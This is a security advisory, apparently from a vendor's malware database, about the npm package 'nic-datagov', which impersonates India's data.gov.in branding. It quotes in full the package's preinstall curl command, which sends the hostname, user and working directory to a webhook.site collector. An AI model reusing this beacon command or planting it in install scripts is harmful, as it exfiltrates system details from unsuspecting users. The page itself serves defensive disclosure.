Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

nic-datagovnpm

Malicious code in nic-datagov (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5836
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall nic-datagov

What this malware does

package.json declares a preinstall script that runs curl --data-urlencode "info=$(hostname && whoami && pwd)" https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/nic-datagov, sending the installer's hostname, current user, and working directory to a webhook.site collector on npm install. The package ships no library code and has no main/files consistent with its stated 'NIC Data.gov.in integration library' description — its sole effect on install is the recon beacon. The name and description impersonate India's NIC/data.gov.in branding, consistent with a targeted dependency-confusion probe against an internal/government namespace.

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf

Frequently asked questions

No. nic-datagov on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006709

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
nic-datagov (npm) malicious package — MAL-2026-5836 | O3 Security